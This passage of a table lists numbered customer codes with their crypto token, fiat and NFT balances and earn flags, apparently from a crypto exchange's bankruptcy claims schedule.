| 07347176 | | BRZ[2], CUSDT[1], DOGE[3], ETH[.00006249], ETHW[.00006249], GRT[1.0014374], LINK[1.10041923], TRX[1], USD[0.06], USDT[1.10041923] | Yes | |
| 07347177 | | BRZ[2], CUSDT[7], DOGE[150.26778902], TRX[4], USD[0.00] | | |
| 07347178 | | USD[10.00] | | |
| 07347179 | | USD[10.00] | | |
| 07347180 | | USD[13.15] | | |
| 07347182 | | USD[10.00] | | |
| 07347183 | | BTC[.02628542], DOGE[18.43747164], USD[0.00] | Yes | |
| 07347184 | | USD[0.00] | | |
| 07347185 | | BRZ[0], USD[0.00] | | |
| 07347186 | | CUSDT[3], DOGE[38.01189783], USD[21.37] | | |
| 07347187 | | USD[10.00] | | |
| 07347188 | | USD[10.00] | | |
| 07347189 | | DOGE[1], USD[0.04] | | |
| 07347190 | | BAT[1], BRZ[2], DOGE[3081.79153255], TRX[1], USD[0.01] | | |
| 07347191 | | DOGE[5520.01695314], TRX[63.64080923], USD[0.00] | | |
| 07347192 | | USD[10.00] | | |
| 07347193 | | BRZ[1], CUSDT[3], DOGE[383.52176972], SUSHI[.00235542], TRX[1], USD[1.85] | | |
| 07347194 | | CUSDT[1], ETH[.00005481], ETHW[.00005481], USD[0.01] | | |
| 07347196 | | BTC[.00067292], CUSDT[4], DOGE[73.8522582], ETH[.0089027], ETHW[.00879326], LTC[.03404216], SOL[.30459703], SUSHI[2.09999431], TRX[113.75499004], UNI[.51247328], USD[0.05] | Yes | |
| 07347197 | | CUSDT[7], DOGE[4801.62913976], ETH[10.54503825], ETHW[10.54124330], LTC[5.77116331], MATIC[1283.034163], SHIB[30801516.73606634], SOL[1.02954193], TRX[4], USD[0.00], USDT[0.00689467] | Yes | |
| 07347198 | | USD[10.00] | | |
| 07347199 | | CUSDT[1], DOGE[4], TRX[3], USD[0.34] | | |
| 07347200 | | USD[10.00] | | |
| 07347201 | | DOGE[1], LTC[8.28301985], SHIB[35032441.19525784], SOL[9.72672766], USD[0.00], USDT[0] | Yes | |
| 07347202 | | USD[10.00] | | |
| 07347203 | | CUSDT[2], DOGE[0], TRX[0], USD[0.00] | | |
| 07347204 | | CUSDT[3], SOL[19.81577635], TRX[1], USD[0.00] | | |
| 07347205 | | USD[10.00] | | |
| 07347206 | | BCH[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], LTC[0], PAXG[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07347207 | | USD[10.00] | | |
| 07347208 | | DOGE[25.26126143], USD[0.00] | | |
| 07347209 | | USD[10.00] | | |
| 07347210 | | CUSDT[3060.97751242], DOGE[.86240621], GBP[0.27], TRX[.00001752], USD[0.00] | | |
| 07347211 | | USD[10.00] | | |
| 07347213 | | USD[10.00] | | |
| 07347214 | | DOGE[1.45527562], USD[0.00] | | |
| 07347215 | | USD[10.00] | | |
| 07347216 | | USD[10.00] | | |
| 07347217 | | AVAX[65.51690942], BRZ[1], DOGE[3], MATIC[248.97990373], SHIB[20], TRX[5], UNI[108.95972642], USD[0.10] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347218 | | USD[10.00] | | |
| 07347219 | | GBP[0.00], SHIB[909944.08575279], USD[0.00] | | |
| 07347220 | | USD[10.00] | | |
| 07347221 | | BCH[0], BTC[0], DOGE[803.84611493], USD[0.01] | | |
| 07347222 | | BRZ[1], BTC[.0000006], CUSDT[3], DOGE[2.06054384], GRT[.00384434], TRX[3], USD[298.50] | | |
| 07347223 | | TRX[202.90334394], USD[0.00] | | |
| 07347224 | | USD[10.00] | | |
| 07347225 | | USD[10.00] | | |
| 07347226 | | USD[10.00] | | |
| 07347227 | | BAT[1050.44362668], BTC[0.00977151], DOGE[1], ETH[0.48254294], ETHW[0.48254294], GRT[527.64072889], SHIB[101368240.73865079], TRX[5], USD[0.00], USDT[1] | | |
| 07347228 | | NFT (368168005741503197/Bahrain Ticket Stub #2371)[1], USD[0.00] | | |
| 07347229 | | CUSDT[3], USD[0.01], USDT[0] | | |
| 07347230 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SHIB[284993.57611853], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000001] | | |
| 07347231 | | USD[10.00] | | |
| 07347232 | | USD[9.15] | Yes | |
| 07347233 | | USD[11.05] | Yes | |
| 07347234 | | BRZ[2], BTC[0], CUSDT[3], DOGE[3], ETH[0], GRT[1.05865915], LTC[0], TRX[3], USD[0.00] | Yes | |
| 07347235 | | CUSDT[1], DOGE[1.77502033], USD[0.00] | Yes | |
| 07347236 | | USD[10.00] | | |
| 07347237 | | USD[10.00] | | |
| 07347238 | | DOGE[.02072173], TRX[1], USD[0.00] | | |
| 07347239 | | CUSDT[1], DOGE[.00009951], USD[0.00] | | |
| 07347240 | | DOGE[.114], GRT[178.821], LINK[18.981], MATIC[9.56], SHIB[73500], SOL[.00284], SUSHI[.4965], TRX[.202], USD[4.17] | | |
| 07347242 | | USD[0.00] | | |
| 07347243 | | DOGE[864.83306517], USD[0.00] | | |
| 07347244 | | USD[10.00] | | |
| 07347245 | | USD[10.00] | | |
| 07347246 | | DOGE[21314.14684286], SHIB[70155707.43604903], SUSHI[7.52355402], TRX[1287.46050878], USD[0.00], YFI[0.04542394] | | |
| 07347247 | | BRZ[1], CUSDT[4], USD[0.00], USDT[1] | | |
| 07347248 | | DOGE[.00008305], TRX[1], USD[10.00] | | |
| 07347249 | | USD[10.00] | | |
| 07347250 | | DOGE[506.66670334], USD[35.00] | | |
| 07347251 | | BRZ[0], USD[0.00], USDT[0] | | |
| 07347252 | | USD[10.00] | | |
| 07347254 | | BRZ[1], CUSDT[1], DOGE[486.27378987], USD[0.01] | Yes | |
| 07347256 | | USD[10.00] | | |
| 07347259 | | USD[10.00] | | |
| 07347260 | | USD[10.00] | | |
| 07347261 | | BAT[1.0165555], CUSDT[7], DOGE[276.07751686], ETH[0.54534107], ETHW[0.54511199], TRX[3], USD[0.00] | Yes | |
| 07347262 | | USD[10.00] | | |
| 07347263 | | USD[10.00] | | |
| 07347264 | | DOGE[337.21720962], USD[0.00] | Yes | |
| 07347265 | | USD[10.00] | | |
| 07347266 | | CUSDT[4], DOGE[0], ETH[0], GRT[.0010394], TRX[8], USD[0.73] | | |
| 07347267 | | DOGE[1.0021583], USD[0.00] | | |
| 07347269 | | USD[10.00] | | |
| 07347270 | | USD[10.00] | | |
| 07347271 | | CUSDT[1], DOGE[117477.78862617], TRX[2], USD[0.00], USDT[1.09711407] | Yes | |
| 07347272 | | USD[10.00] | | |
| 07347273 | | USD[10.00] | | |
| 07347274 | | BTC[0], DOGE[145.69006906], USD[0.00] | | |
| 07347275 | | ETH[.00000001], USD[10.00] | | |
| 07347276 | | DOGE[0], USD[0.00] | | |
| 07347277 | | USD[10.00] | | |
| 07347278 | | BRZ[0], DOGE[0], ETH[0], ETHW[0], GRT[0], USD[0.00] | | |
| 07347279 | | USD[10.00] | | |
| 07347280 | | USD[11.10] | Yes | |
| 07347281 | | SHIB[574.7576876], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347282 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07347283 | | ETH[3.33030891], ETHW[3.33030891], USD[0.00] | | |
| 07347284 | | USD[10.00] | | |
| 07347285 | | USD[10.00] | | |
| 07347286 | | USD[10.00] | | |
| 07347287 | | BRZ[0], DOGE[0], ETH[.00000001], USD[0.00] | | |
| 07347288 | | USD[10.00] | | |
| 07347289 | | USD[10.00] | | |
| 07347290 | | DOGE[161.67160681], USD[0.00] | | |
| 07347291 | | USD[10.00] | | |
| 07347292 | | USD[0.00], USDT[0] | | |
| 07347293 | | BF_POINT[300], DOGE[.00032878], SHIB[157958.65636983], USD[0.00] | Yes | |
| 07347294 | | USD[10.00] | | |
| 07347295 | | USD[10.00] | | |
| 07347297 | | USD[10.00] | | |
| 07347298 | | BTC[.00300492], CUSDT[2], DOGE[204.4670203], USD[0.00] | | |
| 07347299 | | CUSDT[2], DOGE[1.00666027], USD[1.08] | | |
| 07347300 | | DOGE[1259.39795781], USD[10.83] | Yes | |
| 07347301 | | USD[10.00] | | |
| 07347302 | | USD[10.00] | | |
| 07347303 | | USD[10.00] | | |
| 07347304 | | USD[10.00] | | |
| 07347305 | | DOGE[1], TRX[215.71556953], USD[0.00] | | |
| 07347306 | | BAT[.00000001], BF_POINT[300], BRZ[1], CUSDT[20], DAI[.00147499], DOGE[5], LINK[.00000001], SHIB[4], SUSHI[.00000001], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07347307 | | LTC[.04452089], USD[0.00] | | |
| 07347308 | | USD[10.00] | | |
| 07347310 | | CUSDT[1], DOGE[1], ETH[0], GRT[5.13197246], SOL[1.10660269], USD[0.00] | Yes | |
| 07347311 | | USD[10.00] | | |
| 07347312 | | BTC[0], CUSDT[2], DOGE[33.71345423], USD[0.00] | | |
| 07347313 | | USD[10.00] | | |
| 07347314 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07347315 | | DOGE[1], ETH[.04003816], ETHW[.03954378], LINK[4.23320246], NFT [556168441944538392/Aku World Avatar #112][1], SUSHI[5.45137453], TRX[2], USD[10.94] | Yes | |
| 07347316 | | BAT[1.0165555], CUSDT[10], DOGE[2], KSHIB[783.25010256], SOL[1.26868345], TRX[1], USD[0.00] | Yes | |
| 07347317 | | USD[10.00] | | |
| 07347318 | | BTC[.00138244], CUSDT[1], DOGE[2831.87261297], ETH[.00583384], ETHW[.00583384], GRT[17.12441197], LINK[20.94246574], TRX[1], USD[0.00] | | |
| 07347319 | | CUSDT[4], DOGE[2548.2182616], SUSHI[2.18186156], UNI[1.02387433], USD[0.00] | | |
| 07347320 | | USD[10.00] | | |
| 07347321 | | BTC[.01604305], CUSDT[2], DOGE[1713.83395723], GRT[787.62900157], LINK[51.93092200], USD[0.33] | Yes | |
| 07347322 | | USD[10.00] | | |
| 07347323 | | DOGE[894.32083951], TRX[1], USD[1246.30], USDT[1] | | |
| 07347324 | | USD[10.00] | | |
| 07347326 | | DOGE[.67785838], USD[0.00] | Yes | |
| 07347327 | | BRZ[1], CUSDT[7], DOGE[2], USD[0.00] | | |
| 07347328 | | USD[10.00] | | |
| 07347329 | | USD[10.00] | | |
| 07347330 | | CUSDT[249.66572578], SHIB[801695.87260858], TRX[749.22482564], USD[0.00] | Yes | |
| 07347331 | | USD[10.00] | | |
| 07347333 | | USD[10.00] | | |
| 07347334 | | USD[10.00] | | |
| 07347335 | | BRZ[0.00210567], BTC[0], DOGE[0], ETH[0], LTC[0], PAXG[0], TRX[0], USD[0.00], YFI[0] | | |
| 07347336 | | USD[10.00] | | |
| 07347337 | | USD[10.00] | | |
| 07347338 | | DOGE[209.00463007], USD[0.00] | | |
| 07347341 | | USD[10.00] | | |
| 07347342 | | USD[0.05] | | |
| 07347343 | | USD[10.00] | | |
| 07347344 | | DOGE[2.62905094], USD[0.00] | | |
| 07347345 | Contingent, Disputed | TRX[257.04421389], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347346 | | CUSDT[3], USD[0.00] | Yes | |
| 07347347 | | BTC[0], DOGE[0], USD[0.02] | | |
| 07347348 | | USD[10.00] | | |
| 07347349 | | USD[10.00] | | |
| 07347350 | | CUSDT[2], DOGE[1437.75403153], TRX[1], USD[0.01] | | |
| 07347351 | | BAT[0], BTC[0], CUSDT[4], DOGE[0], ETH[0], LTC[0], MATIC[0], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07347352 | | BRZ[1], CUSDT[2], DOGE[2813.06401738], SHIB[613369.58208168], SUSHI[.00000659], USD[1.21] | Yes | |
| 07347353 | | BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[406.72191892], MATIC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000003] | | |
| 07347354 | | USD[10.00] | | |
| 07347355 | | USD[10.00] | | |
| 07347356 | | BRZ[1], CUSDT[1], DOGE[3860.20020653], TRX[1.58799382], USD[0.11] | | |
| 07347360 | | BRZ[1], USD[0.00] | | |
| 07347361 | | CUSDT[1], USD[10.84] | Yes | |
| 07347362 | | DOGE[197.09051046], USD[0.00] | | |
| 07347363 | | CUSDT[13], DOGE[18.37587518], USD[0.00] | | |
| 07347364 | | USD[10.00] | | |
| 07347365 | | USD[10.00] | | |
| 07347366 | | CUSDT[1], DOGE[.13012218], USD[0.00] | | |
| 07347367 | | DOGE[3], TRX[2], USD[0.00], USDT[1] | | |
| 07347368 | | USD[10.00] | | |
| 07347369 | | TRX[161.06343096], USD[0.00] | | |
| 07347370 | | BAT[0], BCH[0], BTC[0], CUSDT[1], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00], YFI[0] | Yes | |
| 07347371 | | USD[10.00] | | |
| 07347372 | | DOGE[3690.42267538], USD[0.00] | Yes | |
| 07347373 | | USD[10.00] | | |
| 07347374 | | USD[10.00] | | |
| 07347375 | | USD[0.01] | | |
| 07347376 | | USD[10.00] | | |
| 07347377 | | DOGE[0], USD[0.00] | | |
| 07347379 | | DOGE[0], KSHIB[838.84695921], SHIB[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07347380 | | USD[10.00] | | |
| 07347381 | | DOGE[1441.81111902], USD[20.00] | | |
| 07347382 | | BF_POINT[100], BTC[.00000007], DOGE[.03119868], ETH[.00001138], ETHW[.00001138], SOL[.00003582], TRX[.00019546], USD[0.00] | Yes | |
| 07347383 | | BAT[0], BRZ[1], CUSDT[10], DOGE[0], LTC[0], SOL[0], TRX[0.00000100], USD[0.01] | | |
| 07347385 | | USD[10.00] | | |
| 07347386 | | USD[10.00] | | |
| 07347387 | | BRZ[3], DOGE[.00000504], GRT[1], TRX[2], USD[0.93], USDT[1] | | |
| 07347388 | | USD[10.00] | | |
| 07347389 | | USD[10.00] | | |
| 07347390 | | USD[10.00] | | |
| 07347391 | | USD[10.00] | | |
| 07347392 | | USD[10.00] | | |
| 07347393 | | TRX[1], USD[0.00] | | |
| 07347395 | | USD[10.00] | | |
| 07347396 | | BRZ[0], DOGE[1096.02236642], TRX[1], USD[0.01], USDT[0] | | |
| 07347399 | | DAI[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07347401 | | USD[10.00] | | |
| 07347402 | | USD[10.00] | | |
| 07347403 | | USD[10.00] | | |
| 07347404 | | USD[10.00] | | |
| 07347405 | | SHIB[172681.74753928], USD[0.00] | | |
| 07347406 | | USD[10.00] | | |
| 07347407 | Contingent, Disputed | SUSHI[1.00275772], USD[0.00] | | |
| 07347408 | | GRT[5.19029535], USD[0.00] | | |
| 07347409 | | MATIC[6.75064753], USD[0.00] | Yes | |
| 07347410 | | ETH[0], USD[0.00] | | |
| 07347411 | | CUSDT[2], DOGE[116.09635116], USD[4.10] | | |
| 07347412 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347413 | | USD[0.00] | | |
| 07347414 | | USD[10.00] | | |
| 07347415 | | BRZ[1], DOGE[.00026831], TRX[1], USD[10.04] | | |
| 07347417 | | BAT[1.35229443], BCH[0], BTC[0], DOGE[0], LTC[0], SOL[0], USD[0.00], YFI[0] | Yes | |
| 07347418 | | GRT[4.28421044], USD[0.00] | | |
| 07347419 | | BRZ[2], BTC[.00000399], CUSDT[4], DOGE[1], USD[432.25] | | |
| 07347420 | | USD[10.00] | | |
| 07347421 | | BRZ[0], DOGE[0], ETH[0], SHIB[955320.17962443], USD[0.00] | | |
| 07347422 | | DOGE[136.13389803], USD[0.00] | | |
| 07347423 | | BRZ[1], CUSDT[13], SOL[.00002164], TRX[1], USD[0.00] | Yes | |
| 07347425 | | DOGE[122.87699275], USD[0.00] | | |
| 07347426 | | BRZ[0], BTC[0], DOGE[4.84062906], USD[0.00] | | |
| 07347428 | | USD[10.00] | | |
| 07347429 | | CUSDT[1], DOGE[15983.76326827], TRX[1], USD[0.00] | Yes | |
| 07347430 | | BTC[0], CUSDT[2], DOGE[1.02180518], LTC[0.00051202], SOL[1.00850471], TRX[153.52979110], UNI[0], USD[0.00] | Yes | |
| 07347431 | | USD[10.00] | | |
| 07347432 | | CUSDT[1], USD[0.00] | | |
| 07347433 | | USD[10.00] | | |
| 07347434 | | BRZ[1], CUSDT[1280.49352823], DOGE[156.54966241], KSHIB[153.05012835], TRX[2], USD[11.90] | Yes | |
| 07347435 | | USD[10.00] | | |
| 07347436 | | USD[10.00] | | |
| 07347437 | | TRX[1], USD[0.01] | | |
| 07347438 | | USD[10.00] | | |
| 07347439 | | AUD[12.80], USD[0.00] | | |
| 07347440 | | DOGE[1.15258618], USD[0.04] | | |
| 07347441 | | USD[10.00] | | |
| 07347442 | | USD[10.00] | | |
| 07347443 | | CUSDT[1416.17499768], DOGE[2788.19511523], SHIB[2], TRX[2], USD[0.80] | | |
| 07347444 | | USD[10.00] | | |
| 07347445 | | USD[10.00] | | |
| 07347446 | | CUSDT[4], DOGE[17431.08636868], GRT[1], TRX[1], USD[0.00] | | |
| 07347447 | | ETH[.03817552], ETHW[.03769869], LINK[14.70263277], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07347448 | | USD[10.00] | | |
| 07347449 | | BTC[0], DOGE[0], ETH[0], LTC[0], SOL[0.00438322], TRX[0], USD[0.00] | | |
| 07347450 | | USD[10.00] | | |
| 07347451 | | DOGE[1], ETH[.00573978], ETHW[.00567138], TRX[1], USD[0.01] | Yes | |
| 07347452 | | USD[11.03] | Yes | |
| 07347453 | | USD[0.00] | Yes | |
| 07347454 | | BRZ[0], DOGE[1.37136135], USD[0.25] | | |
| 07347456 | | USD[0.02] | | |
| 07347457 | | NFT (465557438285149158/RomanDAO #416)[1], NFT (515559709790985122/Galactic Cats #210)[1], USD[4.52], USDT[4.258] | | |
| 07347458 | | USD[0.00] | | |
| 07347459 | | DOGE[131.98210058], USD[3.00] | | |
| 07347460 | | BTC[0], CUSDT[2], DOGE[0], ETH[0.01048517], ETHW[0.01048517], TRX[1], USD[0.01] | | |
| 07347461 | | CUSDT[2], DOGE[21.52659366], USD[0.00] | | |
| 07347462 | | USD[10.00] | | |
| 07347463 | | BRZ[0], CUSDT[2], DOGE[0], ETH[0], LINK[0], SUSHI[0], TRX[1], USD[0.00], USDT[0], YFI[0] | | |
| 07347464 | | SOL[73.71474507], USD[0.00] | Yes | |
| 07347466 | | USD[10.00] | | |
| 07347467 | | BTC[0], DOGE[1261.39516043], ETH[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07347468 | | USD[10.00] | | |
| 07347469 | | CUSDT[1], DOGE[35.18288029], USD[0.00] | | |
| 07347470 | | USD[10.00] | | |
| 07347471 | | USD[10.00] | | |
| 07347472 | | USD[0.00] | | |
| 07347473 | | BRZ[1], CUSDT[2], TRX[16.62203905], USD[0.00], USDT[0] | Yes | |
| 07347474 | | USD[0.00] | | |
| 07347475 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347476 | | USD[10.00] | | |
| 07347477 | | USD[10.00] | | |
| 07347478 | | ETH[0], GRT[21.99069149], SHIB[2079711.84568356], SOL[.85960962], SUSHI[21.2440337], USD[0.00], USDT[20.59297657] | Yes | |
| 07347479 | | USD[10.00] | | |
| 07347480 | | ALGO[778.20892174], BRZ[0], DOGE[2711.62146349], NFT (40288369977049572/Titanz #1720)[1], TRX[0], USD[94.17], USDT[0] | Yes | |
| 07347481 | | BAT[8.49359428], BCH[2.79660331], BRZ[1.37259833], CUSDT[19.00002668], DOGE[55228.04681936], ETH[.56146897], ETHW[.56123296], GRT[16.69552523], LINK[23.30289862], LTC[6.66834218], MATIC[700.13068884], NFT (305232586687376241/Saudi Arabia Ticket Stub #1500)[1], SHIB[6], SOL[8.90503403], SUSHI[501.42518351], TRX[176.21134916], USD[0.00] | Yes | |
| 07347482 | | CUSDT[1], USD[0.01] | Yes | |
| 07347483 | | BCH[.00228434], BTC[0.00482296], CUSDT[3], DOGE[1], ETH[.00061021], ETHW[.00061021], SHIB[120801.56653146], TRX[1], USD[0.00] | | |
| 07347484 | | USD[10.00] | | |
| 07347485 | | TRX[178.65064098], USD[0.00] | | |
| 07347486 | | USD[10.00] | | |
| 07347487 | | BTC[.0036652], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07347488 | | USD[0.00] | | |
| 07347489 | | USD[0.01] | | |
| 07347490 | | USD[10.00] | | |
| 07347491 | | BRZ[1], CUSDT[2], DOGE[2], TRX[4], USD[0.00] | | |
| 07347492 | | USD[10.00] | | |
| 07347493 | | USD[0.00], YFI[0] | | |
| 07347494 | | CUSDT[4], DOGE[1], SHIB[2], TRX[14129.88144389], USD[0.00], USDT[0] | | |
| 07347495 | | USD[10.00] | | |
| 07347496 | | BCH[0], CUSDT[1], TRX[1], USD[0.00] | | |
| 07347497 | | CUSDT[5], DOGE[2952.1509524], GRT[3.76300984], SHIB[737428.04007008], USD[0.24] | Yes | |
| 07347498 | | CUSDT[1], DOGE[3], SOL[22.28600242], TRX[8406.69166205], USD[10.98] | Yes | |
| 07347500 | | USD[10.00] | | |
| 07347501 | | DOGE[1], USD[0.00] | | |
| 07347502 | | USD[10.00] | | |
| 07347504 | | USD[10.00] | | |
| 07347505 | | USD[0.00] | | |
| 07347506 | | USD[10.00] | | |
| 07347507 | | CUSDT[1], ETH[.00000001], ETHW[0], SHIB[132490.79030224], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07347508 | | USD[10.00] | | |
| 07347509 | | TRX[0], USD[0.00] | Yes | |
| 07347510 | | DOGE[.00001327], TRX[1], USD[0.00] | | |
| 07347511 | | USD[10.00] | | |
| 07347512 | | USD[0.00], USDT[0] | | |
| 07347513 | | BRZ[0], BTC[0], CUSDT[3], DOGE[6], ETH[0], ETHW[0], USD[0.00] | | |
| 07347514 | | USD[10.00] | | |
| 07347515 | | DOGE[1], SOL[8.31259782], USD[0.00] | Yes | |
| 07347516 | | USD[10.00] | | |
| 07347517 | | DOGE[0], USD[0.00] | | |
| 07347518 | | USD[10.00] | | |
| 07347519 | | USD[0.00] | | |
| 07347520 | | CUSDT[1], GRT[1], USD[0.00] | | |
| 07347521 | | CUSDT[2], DOGE[1691.93468534], USD[0.00], USDT[24.84776717] | | |
| 07347522 | | CUSDT[12], DOGE[.00001298], USD[58.27] | | |
| 07347523 | | BRZ[1], CUSDT[6], DOGE[2321.49966119], ETH[.06314505], ETHW[.06236215], GRT[22.24815241], SOL[1.84059101], USD[0.41] | Yes | |
| 07347524 | | DOGE[1], MATIC[67.83], USD[0.02] | | |
| 07347525 | | USD[10.00] | | |
| 07347526 | | DOGE[0], ETH[0], SOL[0], TRX[1], USD[0.00], USDT[0] | | |
| 07347527 | | USD[10.00] | | |
| 07347528 | | NFT (457233367283431239/Coachella x FTX Weekend 2 #1216)[1], USD[10.00] | | |
| 07347529 | | BRZ[1], DOGE[1.00526113], USD[0.59] | | |
| 07347530 | | DOGE[73.32998299], USD[9.00] | | |
| 07347531 | | ETH[.0003087], ETHW[.0003087], USD[0.00], USDT[0.00000001] | Yes | |
| 07347532 | | USD[10.00] | | |
| 07347533 | | BAT[1], BRZ[2], CUSDT[4], DOGE[1], TRX[1], USD[0.01] | | |
| 07347534 | | DOGE[1], SHIB[3081506.35006236], SOL[.00000761], TRX[1], USD[0.00] | Yes | |
| 07347535 | | SOL[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347536 | | DOGE[.64994163], USD[0.00] | Yes | |
| 07347537 | | BRZ[1], CUSDT[3], DOGE[143.92176434], TRX[2], USD[0.18] | | |
| 07347538 | | BRZ[0], USD[0.00] | | |
| 07347539 | | BF_POINT[600], ETH[.00005043], ETHW[0.00005042], SOL[.00000001], USD[0.00] | Yes | |
| 07347540 | | CUSDT[1], DOGE[.0005724], ETH[.0001617], ETHW[.0001617], SHIB[1721248.11194314], USD[0.00] | Yes | |
| 07347541 | | SOL[1.40161903], USD[0.00] | Yes | |
| 07347542 | | USD[10.00] | | |
| 07347543 | | USD[10.00] | | |
| 07347545 | | ETH[.00000003], ETHW[.00000003], USD[0.00] | Yes | |
| 07347546 | | USD[10.00] | | |
| 07347547 | | DOGE[29.13596027], USD[0.00] | | |
| 07347548 | | DOGE[3208.68462364], TRX[1], USD[10.00] | | |
| 07347549 | | DOGE[2], GRT[2.0397504], TRX[2], USD[0.00], USDT[1.08662569] | Yes | |
| 07347551 | | USD[10.00] | | |
| 07347554 | | CUSDT[2], DOGE[1950.30935959], TRX[1], USD[0.00] | Yes | |
| 07347555 | | USD[20.00] | | |
| 07347556 | | SHIB[1308489.77270845], USD[0.01] | Yes | |
| 07347557 | | CUSDT[1], DOGE[1], TRX[3], USD[0.01], USDT[1] | | |
| 07347559 | | CUSDT[1], USD[0.00] | | |
| 07347560 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07347561 | | BF_POINT[200], BRZ[1], BTC[.06967937], DOGE[2947.79473477], ETH[0.05493699], ETHW[0.05425299], TRX[8.52255841], USD[0.00], USDT[0] | Yes | |
| 07347562 | | USD[10.00] | | |
| 07347564 | | CUSDT[3], DOGE[3230.05883033], USD[0.00] | | |
| 07347565 | | LTC[0], SHIB[2450.58294734], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07347566 | | USD[10.00] | | |
| 07347567 | | BRZ[1], CUSDT[1], DOGE[42.29132167], TRX[2], USD[0.00] | | |
| 07347568 | | BAT[1], DOGE[181075.78750873], USD[10.00] | | |
| 07347569 | | BAT[2.08647436], BRZ[1], CUSDT[2], DAI[0], DOGE[10011.29624410], LTC[0], TRX[3], USD[0.00], USDT[1.08640734] | Yes | |
| 07347570 | | BRZ[1], CUSDT[1], DOGE[1.00001035], TRX[6], USD[0.00], USDT[1] | | |
| 07347571 | | BTC[.00068851], DOGE[21.5199598], ETH[.00514807], SHIB[9319211.69555817], USD[32.00] | Yes | |
| 07347573 | | ETH[0], ETHW[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07347574 | | USD[10.00] | | |
| 07347575 | | USD[10.00] | | |
| 07347576 | | ETH[.00044906], SHIB[1], USD[0.00] | | |
| 07347577 | | USD[10.00] | | |
| 07347578 | | DOGE[.06547677], USD[0.00] | | |
| 07347579 | | CUSDT[2], DOGE[1634.53892413], TRX[3], USD[355.69] | | |
| 07347581 | | BAT[0], BCH[0.03744920], BTC[0.00190231], CUSDT[1], DOGE[0], ETH[0.02018947], ETHW[0.02018947], SOL[0], TRX[1], USD[5.00] | | |
| 07347582 | | BAT[0], BRZ[0], DOGE[0], ETH[.00000016], ETHW[.00000016], TRX[0], USD[0.00] | | |
| 07347583 | | USD[0.00], USDT[0] | | |
| 07347584 | | USD[0.01], USDT[0] | | |
| 07347585 | | ETH[.00383585], ETHW[.00383585], USD[0.00] | | |
| 07347586 | | DOGE[4122.27932240], GRT[9.7338886], USD[0.00] | Yes | |
| 07347587 | | USD[10.00] | | |
| 07347588 | | USD[10.00] | | |
| 07347589 | | USD[10.00] | | |
| 07347590 | | TRX[2], USD[0.01] | | |
| 07347592 | | USD[10.00] | | |
| 07347593 | | USD[10.00] | | |
| 07347595 | | USD[10.00] | | |
| 07347597 | | DOGE[30.85035676], USD[0.00] | | |
| 07347598 | | BRZ[4], CUSDT[212.08459808], DOGE[166.13269318], ETH[0], TRX[16.19803595], USD[0.01] | Yes | |
| 07347599 | | DOGE[88.89419448], LTC[0], USD[0.00] | Yes | |
| 07347600 | | BRZ[2], BTC[.03689559], CUSDT[8], DOGE[27.89587617], GRT[26.53635599], LINK[5.60420918], LTC[.02065195], PAXG[.0026779], SOL[.3381766], SUSHI[.27978742], TRX[186.48635875], UNI[.120311633], USD[0.93], USDT[1] | | |
| 07347601 | | DOGE[122.96228535], USD[0.00] | | |
| 07347602 | | ETH[.00286032], ETHW[.00286032], USD[0.00] | | |
| 07347603 | | USD[0.00], USDT[0] | | |
| 07347604 | | DOGE[22.08374243], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347605 | | BTC[0], USD[1598.66] | | |
| 07347606 | | BRZ[1], CUSDT[22], SHIB[1], USD[0.00] | Yes | |
| 07347607 | | USD[10.00] | | |
| 07347608 | | BTC[.00060983], CUSDT[3], DOGE[82.55893724], ETH[.00708735], ETHW[.00708735], USD[0.00] | | |
| 07347609 | | USD[10.00] | | |
| 07347610 | | CUSDT[1], SHIB[3093960.24652715], TRX[1], USD[0.00] | | |
| 07347612 | | USD[10.00] | | |
| 07347613 | | BRZ[1], CUSDT[2], TRX[5], USD[0.01] | | |
